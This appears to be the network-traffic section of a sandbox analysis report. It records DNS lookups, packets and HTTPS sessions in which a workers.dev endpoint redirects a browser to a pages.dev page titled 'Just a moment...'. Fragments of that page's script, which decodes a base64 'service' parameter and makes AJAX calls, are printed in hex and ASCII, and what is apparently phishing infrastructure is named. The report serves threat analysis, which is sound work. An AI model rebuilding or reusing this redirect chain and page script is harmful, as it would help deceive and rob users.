                                                              Dec 19, 2024 17:17:16.410201073 CET49713443192.168.2.7172.217.19.164
                                                              Dec 19, 2024 17:17:16.410278082 CET44349713172.217.19.164192.168.2.7
                                                              Dec 19, 2024 17:17:20.954787970 CET49677443192.168.2.720.50.201.200
                                                              Dec 19, 2024 17:18:04.205369949 CET49873443192.168.2.7172.217.19.164
                                                              Dec 19, 2024 17:18:04.205459118 CET44349873172.217.19.164192.168.2.7
                                                              Dec 19, 2024 17:18:04.205552101 CET49873443192.168.2.7172.217.19.164
                                                              Dec 19, 2024 17:18:04.205758095 CET49873443192.168.2.7172.217.19.164
                                                              Dec 19, 2024 17:18:04.205785990 CET44349873172.217.19.164192.168.2.7
                                                              Dec 19, 2024 17:18:05.908327103 CET44349873172.217.19.164192.168.2.7
                                                              Dec 19, 2024 17:18:05.916088104 CET49873443192.168.2.7172.217.19.164
                                                              Dec 19, 2024 17:18:05.916157961 CET44349873172.217.19.164192.168.2.7
                                                              Dec 19, 2024 17:18:05.917382002 CET44349873172.217.19.164192.168.2.7
                                                              Dec 19, 2024 17:18:05.920970917 CET49873443192.168.2.7172.217.19.164
                                                              Dec 19, 2024 17:18:05.921159029 CET44349873172.217.19.164192.168.2.7
                                                              Dec 19, 2024 17:18:05.970172882 CET49873443192.168.2.7172.217.19.164
                                                              Dec 19, 2024 17:18:15.598625898 CET44349873172.217.19.164192.168.2.7
                                                              Dec 19, 2024 17:18:15.598789930 CET44349873172.217.19.164192.168.2.7
                                                              Dec 19, 2024 17:18:15.598848104 CET49873443192.168.2.7172.217.19.164
                                                              Dec 19, 2024 17:18:16.410481930 CET49873443192.168.2.7172.217.19.164
                                                              Dec 19, 2024 17:18:16.410541058 CET44349873172.217.19.164192.168.2.7
                                                              Dec 19, 2024 17:19:04.268404961 CET50006443192.168.2.7172.217.19.164
                                                              Dec 19, 2024 17:19:04.268501997 CET44350006172.217.19.164192.168.2.7
                                                              Dec 19, 2024 17:19:04.268610001 CET50006443192.168.2.7172.217.19.164
                                                              Dec 19, 2024 17:19:04.268840075 CET50006443192.168.2.7172.217.19.164
                                                              Dec 19, 2024 17:19:04.268853903 CET44350006172.217.19.164192.168.2.7
                                                              Dec 19, 2024 17:19:05.965038061 CET44350006172.217.19.164192.168.2.7
                                                              Dec 19, 2024 17:19:05.966536999 CET50006443192.168.2.7172.217.19.164
                                                              Dec 19, 2024 17:19:05.966562033 CET44350006172.217.19.164192.168.2.7
                                                              Dec 19, 2024 17:19:05.967022896 CET44350006172.217.19.164192.168.2.7
                                                              Dec 19, 2024 17:19:05.967530012 CET50006443192.168.2.7172.217.19.164
                                                              Dec 19, 2024 17:19:05.967607021 CET44350006172.217.19.164192.168.2.7
                                                              Dec 19, 2024 17:19:06.017234087 CET50006443192.168.2.7172.217.19.164
                                                              Dec 19, 2024 17:19:15.661206007 CET44350006172.217.19.164192.168.2.7
                                                              Dec 19, 2024 17:19:15.661271095 CET44350006172.217.19.164192.168.2.7
                                                              Dec 19, 2024 17:19:15.661330938 CET50006443192.168.2.7172.217.19.164
                                                              Dec 19, 2024 17:19:16.409950018 CET50006443192.168.2.7172.217.19.164
                                                              Dec 19, 2024 17:19:16.409985065 CET44350006172.217.19.164192.168.2.7

                                                              UDP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Dec 19, 2024 17:17:00.062762976 CET53589391.1.1.1192.168.2.7
                                                              Dec 19, 2024 17:17:00.071623087 CET5289153192.168.2.71.1.1.1
                                                              Dec 19, 2024 17:17:00.071842909 CET5021253192.168.2.71.1.1.1
                                                              Dec 19, 2024 17:17:00.201952934 CET53582131.1.1.1192.168.2.7
                                                              Dec 19, 2024 17:17:00.210016966 CET53502121.1.1.1192.168.2.7
                                                              Dec 19, 2024 17:17:01.911922932 CET4998553192.168.2.71.1.1.1
                                                              Dec 19, 2024 17:17:01.912116051 CET6505053192.168.2.71.1.1.1
                                                              Dec 19, 2024 17:17:01.917202950 CET6419553192.168.2.71.1.1.1
                                                              Dec 19, 2024 17:17:01.917368889 CET6211553192.168.2.71.1.1.1
                                                              Dec 19, 2024 17:17:02.055423975 CET53621151.1.1.1192.168.2.7
                                                              Dec 19, 2024 17:17:02.071948051 CET53650501.1.1.1192.168.2.7
                                                              Dec 19, 2024 17:17:02.078742027 CET53499851.1.1.1192.168.2.7
                                                              Dec 19, 2024 17:17:02.891566038 CET53579901.1.1.1192.168.2.7
                                                              Dec 19, 2024 17:17:03.302624941 CET123123192.168.2.740.81.94.65
                                                              Dec 19, 2024 17:17:04.142496109 CET5995353192.168.2.71.1.1.1
                                                              Dec 19, 2024 17:17:04.142601013 CET5057553192.168.2.71.1.1.1
                                                              Dec 19, 2024 17:17:04.282064915 CET53505751.1.1.1192.168.2.7
                                                              Dec 19, 2024 17:17:04.282361031 CET53599531.1.1.1192.168.2.7
                                                              Dec 19, 2024 17:17:04.628398895 CET12312340.81.94.65192.168.2.7
                                                              Dec 19, 2024 17:17:06.098124027 CET5499953192.168.2.71.1.1.1
                                                              Dec 19, 2024 17:17:06.098124027 CET5169653192.168.2.71.1.1.1
                                                              Dec 19, 2024 17:17:06.108020067 CET5158753192.168.2.71.1.1.1
                                                              Dec 19, 2024 17:17:06.108211040 CET5443953192.168.2.71.1.1.1
                                                              Dec 19, 2024 17:17:06.246227980 CET53515871.1.1.1192.168.2.7
                                                              Dec 19, 2024 17:17:06.246756077 CET53544391.1.1.1192.168.2.7
                                                              Dec 19, 2024 17:17:06.259272099 CET53516961.1.1.1192.168.2.7
                                                              Dec 19, 2024 17:17:06.259289026 CET53549991.1.1.1192.168.2.7
                                                              Dec 19, 2024 17:17:09.189302921 CET5131753192.168.2.71.1.1.1
                                                              Dec 19, 2024 17:17:09.189625025 CET6273953192.168.2.71.1.1.1
                                                              Dec 19, 2024 17:17:09.326513052 CET53513171.1.1.1192.168.2.7
                                                              Dec 19, 2024 17:17:09.326674938 CET53627391.1.1.1192.168.2.7
                                                              Dec 19, 2024 17:17:11.446988106 CET5384053192.168.2.71.1.1.1
                                                              Dec 19, 2024 17:17:11.447166920 CET4956853192.168.2.71.1.1.1
                                                              Dec 19, 2024 17:17:11.583909988 CET53538401.1.1.1192.168.2.7
                                                              Dec 19, 2024 17:17:11.584151983 CET53495681.1.1.1192.168.2.7
                                                              Dec 19, 2024 17:17:11.860121965 CET5423053192.168.2.71.1.1.1
                                                              Dec 19, 2024 17:17:11.860264063 CET5691653192.168.2.71.1.1.1
                                                              Dec 19, 2024 17:17:11.998238087 CET53542301.1.1.1192.168.2.7
                                                              Dec 19, 2024 17:17:11.998279095 CET53569161.1.1.1192.168.2.7
                                                              Dec 19, 2024 17:17:12.458825111 CET6486653192.168.2.71.1.1.1
                                                              Dec 19, 2024 17:17:12.458981991 CET5534953192.168.2.71.1.1.1
                                                              Dec 19, 2024 17:17:12.624989033 CET53587311.1.1.1192.168.2.7
                                                              Dec 19, 2024 17:17:13.226433992 CET53553491.1.1.1192.168.2.7
                                                              Dec 19, 2024 17:17:13.227402925 CET53648661.1.1.1192.168.2.7
                                                              Dec 19, 2024 17:17:19.858500004 CET53506461.1.1.1192.168.2.7
                                                              Dec 19, 2024 17:17:38.780858040 CET53589261.1.1.1192.168.2.7
                                                              Dec 19, 2024 17:17:57.412837982 CET138138192.168.2.7192.168.2.255
                                                              Dec 19, 2024 17:17:59.687477112 CET53506541.1.1.1192.168.2.7
                                                              Dec 19, 2024 17:18:01.608769894 CET53505291.1.1.1192.168.2.7
                                                              Dec 19, 2024 17:18:31.968214989 CET53492031.1.1.1192.168.2.7
                                                              Dec 19, 2024 17:19:17.487701893 CET53575341.1.1.1192.168.2.7

                                                              DNS Queries

                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Dec 19, 2024 17:17:00.071623087 CET192.168.2.71.1.1.10xc267Standard query (0)cdn.jsdelivr.netA (IP address)IN (0x0001)false
                                                              Dec 19, 2024 17:17:00.071842909 CET192.168.2.71.1.1.10xd381Standard query (0)cdn.jsdelivr.net65IN (0x0001)false
                                                              Dec 19, 2024 17:17:01.911922932 CET192.168.2.71.1.1.10x6095Standard query (0)tiny-hat-eab8.pagenew.workers.devA (IP address)IN (0x0001)false
                                                              Dec 19, 2024 17:17:01.912116051 CET192.168.2.71.1.1.10xac50Standard query (0)tiny-hat-eab8.pagenew.workers.dev65IN (0x0001)false
                                                              Dec 19, 2024 17:17:01.917202950 CET192.168.2.71.1.1.10x3e0fStandard query (0)cdn.jsdelivr.netA (IP address)IN (0x0001)false
                                                              Dec 19, 2024 17:17:01.917368889 CET192.168.2.71.1.1.10x5cbdStandard query (0)cdn.jsdelivr.net65IN (0x0001)false
                                                              Dec 19, 2024 17:17:04.142496109 CET192.168.2.71.1.1.10xc529Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                              Dec 19, 2024 17:17:04.142601013 CET192.168.2.71.1.1.10x6f9bStandard query (0)www.google.com65IN (0x0001)false
                                                              Dec 19, 2024 17:17:06.098124027 CET192.168.2.71.1.1.10x40a9Standard query (0)proposal-5ye.pages.dev65IN (0x0001)false
                                                              Dec 19, 2024 17:17:06.098124027 CET192.168.2.71.1.1.10x6d50Standard query (0)proposal-5ye.pages.devA (IP address)IN (0x0001)false
                                                              Dec 19, 2024 17:17:06.108020067 CET192.168.2.71.1.1.10x316eStandard query (0)tiny-hat-eab8.pagenew.workers.devA (IP address)IN (0x0001)false
                                                              Dec 19, 2024 17:17:06.108211040 CET192.168.2.71.1.1.10xa1ecStandard query (0)tiny-hat-eab8.pagenew.workers.dev65IN (0x0001)false
                                                              Dec 19, 2024 17:17:09.189302921 CET192.168.2.71.1.1.10x137bStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                              Dec 19, 2024 17:17:09.189625025 CET192.168.2.71.1.1.10x8d2fStandard query (0)code.jquery.com65IN (0x0001)false
                                                              Dec 19, 2024 17:17:11.446988106 CET192.168.2.71.1.1.10x451Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                              Dec 19, 2024 17:17:11.447166920 CET192.168.2.71.1.1.10x4c80Standard query (0)code.jquery.com65IN (0x0001)false
                                                              Dec 19, 2024 17:17:11.860121965 CET192.168.2.71.1.1.10x2e69Standard query (0)proposal-5ye.pages.devA (IP address)IN (0x0001)false
                                                              Dec 19, 2024 17:17:11.860264063 CET192.168.2.71.1.1.10x3deaStandard query (0)proposal-5ye.pages.dev65IN (0x0001)false
                                                              Dec 19, 2024 17:17:12.458825111 CET192.168.2.71.1.1.10x36aaStandard query (0)natrium100gram.siteA (IP address)IN (0x0001)false
                                                              Dec 19, 2024 17:17:12.458981991 CET192.168.2.71.1.1.10x629eStandard query (0)natrium100gram.site65IN (0x0001)false

                                                              DNS Answers

                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Dec 19, 2024 17:17:00.209750891 CET1.1.1.1192.168.2.70xc267No error (0)cdn.jsdelivr.netcdn.jsdelivr.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                              Dec 19, 2024 17:17:00.210016966 CET1.1.1.1192.168.2.70xd381No error (0)cdn.jsdelivr.netjsdelivr.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                              Dec 19, 2024 17:17:02.055423975 CET1.1.1.1192.168.2.70x5cbdNo error (0)cdn.jsdelivr.netjsdelivr.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                              Dec 19, 2024 17:17:02.056531906 CET1.1.1.1192.168.2.70x3e0fNo error (0)cdn.jsdelivr.netcdn.jsdelivr.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                              Dec 19, 2024 17:17:02.071948051 CET1.1.1.1192.168.2.70xac50No error (0)tiny-hat-eab8.pagenew.workers.dev65IN (0x0001)false
                                                              Dec 19, 2024 17:17:02.078742027 CET1.1.1.1192.168.2.70x6095No error (0)tiny-hat-eab8.pagenew.workers.dev104.21.51.134A (IP address)IN (0x0001)false
                                                              Dec 19, 2024 17:17:02.078742027 CET1.1.1.1192.168.2.70x6095No error (0)tiny-hat-eab8.pagenew.workers.dev172.67.181.35A (IP address)IN (0x0001)false
                                                              Dec 19, 2024 17:17:04.282064915 CET1.1.1.1192.168.2.70x6f9bNo error (0)www.google.com65IN (0x0001)false
                                                              Dec 19, 2024 17:17:04.282361031 CET1.1.1.1192.168.2.70xc529No error (0)www.google.com172.217.19.164A (IP address)IN (0x0001)false
                                                              Dec 19, 2024 17:17:06.246227980 CET1.1.1.1192.168.2.70x316eNo error (0)tiny-hat-eab8.pagenew.workers.dev104.21.51.134A (IP address)IN (0x0001)false
                                                              Dec 19, 2024 17:17:06.246227980 CET1.1.1.1192.168.2.70x316eNo error (0)tiny-hat-eab8.pagenew.workers.dev172.67.181.35A (IP address)IN (0x0001)false
                                                              Dec 19, 2024 17:17:06.246756077 CET1.1.1.1192.168.2.70xa1ecNo error (0)tiny-hat-eab8.pagenew.workers.dev65IN (0x0001)false
                                                              Dec 19, 2024 17:17:06.259272099 CET1.1.1.1192.168.2.70x6d50No error (0)proposal-5ye.pages.dev172.66.47.118A (IP address)IN (0x0001)false
                                                              Dec 19, 2024 17:17:06.259272099 CET1.1.1.1192.168.2.70x6d50No error (0)proposal-5ye.pages.dev172.66.44.138A (IP address)IN (0x0001)false
                                                              Dec 19, 2024 17:17:06.259289026 CET1.1.1.1192.168.2.70x40a9No error (0)proposal-5ye.pages.dev65IN (0x0001)false
                                                              Dec 19, 2024 17:17:09.326513052 CET1.1.1.1192.168.2.70x137bNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                              Dec 19, 2024 17:17:09.326513052 CET1.1.1.1192.168.2.70x137bNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                              Dec 19, 2024 17:17:09.326513052 CET1.1.1.1192.168.2.70x137bNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                              Dec 19, 2024 17:17:09.326513052 CET1.1.1.1192.168.2.70x137bNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                              Dec 19, 2024 17:17:11.583909988 CET1.1.1.1192.168.2.70x451No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                              Dec 19, 2024 17:17:11.583909988 CET1.1.1.1192.168.2.70x451No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                              Dec 19, 2024 17:17:11.583909988 CET1.1.1.1192.168.2.70x451No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                              Dec 19, 2024 17:17:11.583909988 CET1.1.1.1192.168.2.70x451No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                              Dec 19, 2024 17:17:11.998238087 CET1.1.1.1192.168.2.70x2e69No error (0)proposal-5ye.pages.dev172.66.47.118A (IP address)IN (0x0001)false
                                                              Dec 19, 2024 17:17:11.998238087 CET1.1.1.1192.168.2.70x2e69No error (0)proposal-5ye.pages.dev172.66.44.138A (IP address)IN (0x0001)false
                                                              Dec 19, 2024 17:17:11.998279095 CET1.1.1.1192.168.2.70x3deaNo error (0)proposal-5ye.pages.dev65IN (0x0001)false
                                                              Dec 19, 2024 17:17:13.227402925 CET1.1.1.1192.168.2.70x36aaNo error (0)natrium100gram.site194.163.42.36A (IP address)IN (0x0001)false

                                                              HTTP Request Dependency Graph

                                                              • tiny-hat-eab8.pagenew.workers.dev
                                                              • proposal-5ye.pages.dev
                                                              • https:
                                                                • code.jquery.com
                                                                • natrium100gram.site

                                                              HTTPS Proxied Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.749711104.21.51.1344435912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 16:17:04 UTC507OUTGET / HTTP/1.1
                                                              Host: tiny-hat-eab8.pagenew.workers.dev
                                                              Connection: keep-alive
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              sec-ch-ua-mobile: ?0
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              sec-ch-ua-platform: "Windows"
                                                              Accept: */*
                                                              Origin: null
                                                              Sec-Fetch-Site: cross-site
                                                              Sec-Fetch-Mode: cors
                                                              Sec-Fetch-Dest: empty
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              2024-12-19 16:17:06 UTC898INHTTP/1.1 200 OK
                                                              Date: Thu, 19 Dec 2024 16:17:05 GMT
                                                              Content-Type: application/json
                                                              Content-Length: 74
                                                              Connection: close
                                                              Access-Control-Allow-Origin: *
                                                              Access-Control-Allow-Headers: Content-Type
                                                              Access-Control-Allow-Methods: GET, OPTIONS
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T0H%2FmRIiJtt2XCqPfJsjGoT78%2BkMpitoSTSAr1uAuAvNPCWm%2BJmLWIapE%2FSozMSppkTYfpydX%2F2v85s0dYGR52Jq9QBQqwwbpwZINp1a2iLAjJemMtmnoH%2BkDeatWIUcvRpfs3JX35L1HgTMtP%2FXkqNJB2g%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8f48b36518bcc427-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1484&min_rtt=1481&rtt_var=562&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=1085&delivery_rate=1937624&cwnd=32&unsent_bytes=0&cid=7121bc45f193a1fe&ts=1553&x=0"
                                                              2024-12-19 16:17:06 UTC74INData Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 70 72 6f 70 6f 73 61 6c 2d 35 79 65 2e 70 61 67 65 73 2e 64 65 76 2f 23 3f 73 65 72 76 69 63 65 3d 22 7d
                                                              Data Ascii: {"status":"success","message":"https://proposal-5ye.pages.dev/#?service="}


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.749724104.21.51.1344435912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 16:17:08 UTC357OUTGET / HTTP/1.1
                                                              Host: tiny-hat-eab8.pagenew.workers.dev
                                                              Connection: keep-alive
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              Accept: */*
                                                              Sec-Fetch-Site: none
                                                              Sec-Fetch-Mode: cors
                                                              Sec-Fetch-Dest: empty
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              2024-12-19 16:17:10 UTC890INHTTP/1.1 200 OK
                                                              Date: Thu, 19 Dec 2024 16:17:10 GMT
                                                              Content-Type: application/json
                                                              Content-Length: 74
                                                              Connection: close
                                                              Access-Control-Allow-Origin: *
                                                              Access-Control-Allow-Headers: Content-Type
                                                              Access-Control-Allow-Methods: GET, OPTIONS
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l%2B1l6drw1D6dsW3wRgNbKsk28uImHoJb1W5LnQO2Pr5jOtKBw7dWCSj%2Bg8brhgvH3I1y36sHaRYgP8YHKfSp0IgDtFQIB3gShJfmdr1PiQ1PC1F6WwBIuGex4st9VCZ8k5B8hpbr8ir%2FLVmSBNYv3t9hSYg%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8f48b37f1f36436a-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2070&min_rtt=2062&rtt_var=790&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=935&delivery_rate=1370248&cwnd=184&unsent_bytes=0&cid=ce693e7404f7fa87&ts=1853&x=0"
                                                              2024-12-19 16:17:10 UTC74INData Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 70 72 6f 70 6f 73 61 6c 2d 35 79 65 2e 70 61 67 65 73 2e 64 65 76 2f 23 3f 73 65 72 76 69 63 65 3d 22 7d
                                                              Data Ascii: {"status":"success","message":"https://proposal-5ye.pages.dev/#?service="}


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              2192.168.2.749726172.66.47.1184435912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 16:17:08 UTC651OUTGET / HTTP/1.1
                                                              Host: proposal-5ye.pages.dev
                                                              Connection: keep-alive
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              sec-ch-ua-mobile: ?0
                                                              sec-ch-ua-platform: "Windows"
                                                              Upgrade-Insecure-Requests: 1
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                              Sec-Fetch-Site: cross-site
                                                              Sec-Fetch-Mode: navigate
                                                              Sec-Fetch-Dest: document
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              2024-12-19 16:17:09 UTC942INHTTP/1.1 200 OK
                                                              Date: Thu, 19 Dec 2024 16:17:09 GMT
                                                              Content-Type: text/html; charset=utf-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Access-Control-Allow-Origin: *
                                                              Cache-Control: public, max-age=0, must-revalidate
                                                              referrer-policy: strict-origin-when-cross-origin
                                                              x-content-type-options: nosniff
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tNJ4CxZUkwz8vRXHfQTHviRlPjnTI8lrc%2B4MoyBzqdpRJ7rGlj6bxQzPHHso8Lc%2FYG%2B945u%2B1OQHSEo4S5tls%2Bjj1DaYMWWIN%2Fhln%2B85SdO1kgNfDP79Si61RewMuedHoUGrf5jcEVgw"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8f48b37f081fde95-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1710&min_rtt=1709&rtt_var=642&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2860&recv_bytes=1229&delivery_rate=1708601&cwnd=240&unsent_bytes=0&cid=9714e10967aeaf07&ts=486&x=0"
                                                              2024-12-19 16:17:09 UTC427INData Raw: 64 63 61 0d 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 2e 6a 71 75 65 72 79 2e 63 6f 6d 2f 6a 71 75 65 72 79 2d 33 2e 37 2e 31 2e 6d 69 6e 2e 6a 73 22 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 32 35 36 2d 2f 4a 71 54 33 53 51 66 61 77 52 63 76 2f 42 49 48 50 54 68 6b 42 76 73 30 4f 45 76 74 46 46 6d 71 50 46 2f 6c 59 49 2f 43 78 6f 3d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c
                                                              Data Ascii: dca<!DOCTYPE html><html> <head> <meta charset="utf-8" /> <title>Just a moment...</title> <script src="https://code.jquery.com/jquery-3.7.1.min.js" integrity="sha256-/JqT3SQfawRcv/BIHPThkBvs0OEvtFFmqPF/lYI/Cxo=" crossorigin="anonymous"><
                                                              2024-12-19 16:17:09 UTC1369INData Raw: 6c 69 74 28 22 23 22 29 5b 31 5d 3b 0a 20 20 20 20 20 20 20 20 2f 2f 20 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 68 61 73 68 32 5b 31 5d 29 3b 0a 0a 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 75 72 6c 50 61 72 61 6d 73 20 3d 20 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 28 68 61 73 68 56 61 6c 75 65 29 3b 0a 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 6e 61 6d 65 20 3d 20 75 72 6c 50 61 72 61 6d 73 2e 67 65 74 28 27 73 65 72 76 69 63 65 27 29 3b 0a 0a 20 20 20 20 20 20 20 20 0a 0a 20 20 20 20 20 20 20 20 2f 2f 20 44 65 63 6f 64 65 20 74 68 65 20 42 61 73 65 36 34 2d 65 6e 63 6f 64 65 64 20 76 61 6c 75 65 0a 20 20 20 20 20 20 20 20 76 61 72 20 64 65 63 6f 64 65 64 56 61 6c 75 65 20 3d 20 61 74 6f 62 28 6e 61 6d 65 29 3b 0a 20 20 20 20 20 20 20 20 63
                                                              Data Ascii: lit("#")[1]; // console.log(hash2[1]); const urlParams = new URLSearchParams(hashValue); const name = urlParams.get('service'); // Decode the Base64-encoded value var decodedValue = atob(name); c
                                                              2024-12-19 16:17:09 UTC1369INData Raw: 43 4a 74 59 57 4d 69 4f 69 4a 69 4d 44 64 6b 4f 54 6c 6d 4d 6d 56 6c 4e 54 46 6a 5a 6a 45 34 59 6a 4a 6d 5a 57 4e 6d 4e 6a 63 77 4d 6a 6c 69 4d 6a 67 32 5a 6d 59 7a 5a 54 64 6d 4d 7a 45 30 5a 57 46 68 4f 44 63 7a 5a 6a 64 69 5a 54 67 32 4f 44 52 6a 5a 6a 45 34 4e 32 52 68 4f 54 55 32 49 6e 30 25 33 44 22 2c 0a 20 20 20 20 20 20 20 20 2f 2f 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 2f 2f 20 20 20 70 72 6f 63 65 73 73 44 61 74 61 3a 20 66 61 6c 73 65 2c 0a 20 20 20 20 20 20 20 20 2f 2f 20 20 20 6d 69 6d 65 54 79 70 65 3a 20 22 6d 75 6c 74 69 70 61 72 74 2f 66 6f 72 6d 2d 64 61 74 61 22 2c 0a 20 20 20 20 20 20 20 20 2f 2f 20 20 20 63 6f 6e 74 65 6e 74 54 79 70 65 3a 20 66 61 6c 73 65 2c 0a 20 20 20 20 20 20 20 20 2f 2f 20 20 20 64 61 74 61 3a 20 66 6f 72 6d
                                                              Data Ascii: CJtYWMiOiJiMDdkOTlmMmVlNTFjZjE4YjJmZWNmNjcwMjliMjg2ZmYzZTdmMzE0ZWFhODczZjdiZTg2ODRjZjE4N2RhOTU2In0%3D", // }, // processData: false, // mimeType: "multipart/form-data", // contentType: false, // data: form
                                                              2024-12-19 16:17:09 UTC372INData Raw: 79 6f 75 72 20 73 75 70 70 6f 72 74 20 21 20 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 65 72 72 6f 72 2e 73 74 61 74 75 73 29 3b 0a 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 20 20 20 20 0a 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 73 65 74 54 69 6d 65 6f 75 74 28 28 29 20 3d 3e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 6a 61 76 61 73 63 72 69 70 74 43 61 6c 6c 62 61 63 6b 28 29 0a 20 20 20 20 20 20 20 20 7d 2c 20 31 30 30 30 29 3b 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 2f 2f 20 7d 29 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 45 4e 44 20 44 45 57
                                                              Data Ascii: your support ! "; } console.log(error.status); }); } setTimeout(() => { javascriptCallback() }, 1000); // }); </script> ... END DEW
                                                              2024-12-19 16:17:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              3192.168.2.749732151.101.130.1374435912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-19 16:17:10 UTC577OUTGET /jquery-3.7.1.min.js HTTP/1.1
                                                              Host: code.jquery.com
                                                              Connection: keep-alive
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              Origin: https://proposal-5ye.pages.dev
                                                              sec-ch-ua-mobile: ?0
